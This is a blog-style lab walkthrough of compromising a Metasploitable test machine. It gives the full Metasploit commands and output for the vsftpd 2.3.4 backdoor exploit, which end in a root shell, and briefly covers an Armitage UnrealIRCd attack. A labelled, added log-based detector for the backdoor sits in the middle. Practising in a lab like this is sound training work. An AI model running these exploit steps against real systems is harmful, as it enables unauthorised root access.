In my lab environment, the IP of the attacker machine is 192.168.127.133, and the victim machine is 192.168.127.154.
So, let's begin by port scanning the target to see what's available. I'll perform a SYN scan with service and OS detection:
Whoaa! We can see there are plenty of services just waiting to receive some attention. Well, this is meant to be exploitable from all angles to facilitate learning and exercise. And by the way, I'll ignore that cozy root shell on port 1524. Let's just get our own!
Metasploit
Since we saw there are 2 FTP servers running, let's launch Metasploit and search for a suitable exploit.
msf > search vsftpd
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
Excellent! We have a ready exploit for the version of vsftpd that's listening on our target. Let's select it and look at its requirements:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
Let's look at the available payloads:
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection
Now let's set the remote host to the IP of the victim and the payload to the cmd/unix/interact payload, and review our configuration:
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
PAYLOAD => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 21 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
All set! Now let's see if we can get in:
msf exploit(vsftpd_234_backdoor) > exploit
[*] The port used by the backdoor bind listener is already open
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.127.133:57347 -> 192.168.127.154:6200) at 2014-04-15 13:44:16 -0400
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Woohoo! We're in and we're root! The machine is now at our mercy! But for now, let's just get back to the initial board and pick another service to exploit, this time using Armitage.
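From the defender's side, the session above leaves a telltale pair in connection logs: an FTP control connection to tcp/21 followed, seconds later, by the same client reaching the backdoor's bind listener on tcp/6200. The following is an added example (not code from the original post): a small detector over constructed firewall-style log lines, whose format is an assumption; only the 13:44:16 line mirrors the session shown above.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (not from the original post). Two of the lines are
# decoys: a 6200 hit with no prior FTP connection, and a later FTP-only login.
SAMPLE_LOG = """\
2014-04-15 13:44:10 TCP 192.168.127.133:57340 -> 192.168.127.154:21 NEW
2014-04-15 13:44:12 TCP 192.168.127.133:57341 -> 192.168.127.154:22 NEW
2014-04-15 13:44:16 TCP 192.168.127.133:57347 -> 192.168.127.154:6200 NEW
2014-04-15 13:50:00 TCP 192.168.127.200:40000 -> 192.168.127.154:6200 NEW
2014-04-15 14:30:00 TCP 192.168.127.133:57400 -> 192.168.127.154:21 NEW
"""

# Assumed line format: "<date> <time> TCP <src>:<sport> -> <dst>:<dport> NEW"
LINE_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) TCP "
    r"(\d+\.\d+\.\d+\.\d+):\d+ -> (\d+\.\d+\.\d+\.\d+):(\d+) NEW$"
)

FTP_PORT = 21
BACKDOOR_PORT = 6200  # bind listener opened by the vsftpd 2.3.4 backdoor


def parse_connections(text):
    """Yield (timestamp, client_ip, server_ip, dst_port) per well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            yield ts, m.group(2), m.group(3), int(m.group(4))


def find_backdoor_sessions(text, window_seconds=300):
    """Return [(client, server, "YYYY-MM-DD HH:MM:SS")] for each tcp/6200
    connection that follows an FTP control connection from the same client
    to the same server within window_seconds. Lone 6200 hits are ignored."""
    window = timedelta(seconds=window_seconds)
    last_ftp = {}  # (client, server) -> time of most recent FTP connection
    hits = []
    for ts, client, server, port in sorted(parse_connections(text)):
        key = (client, server)
        if port == FTP_PORT:
            last_ftp[key] = ts
        elif port == BACKDOOR_PORT:
            seen = last_ftp.get(key)
            if seen is not None and timedelta(0) <= ts - seen <= window:
                hits.append((client, server, ts.isoformat(sep=" ")))
    return hits


if __name__ == "__main__":
    for client, server, when in find_backdoor_sessions(SAMPLE_LOG):
        print(f"[!] {when}: {client} reached tcp/{BACKDOOR_PORT} on {server} right after FTP")
```

The same pairing logic works on Zeek conn.log or netfilter output once the regex is adjusted; an alert on tcp/6200 alone is also reasonable on a network where nothing legitimate listens there.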
Armitage
On the Armitage window, let's first add our target to the workspace. Go to the Hosts tab and select Add Hosts, then enter the IP of the target. The workspace will look like this:
Let's take a shortcut: go to the Attacks tab and select Find Attacks. After the analysis is complete, we can right-click the host and see a list of attacks that might work on the target, split into service categories such as SSH, HTTP, Samba, etc. This time we'll go for the IRC service, using the unreal_ircd_3281_backdoor exploit. Launch it and we can see we've successfully gained a session:
So here we went through using Metasploit and Armitage to hack a vulnerable machine. Of course, you won't (hopefully) find such easy targets in the wild, but this is a good exercise.
Today's cookie:
You will be a winner today. Pick a fight with a four-year-old.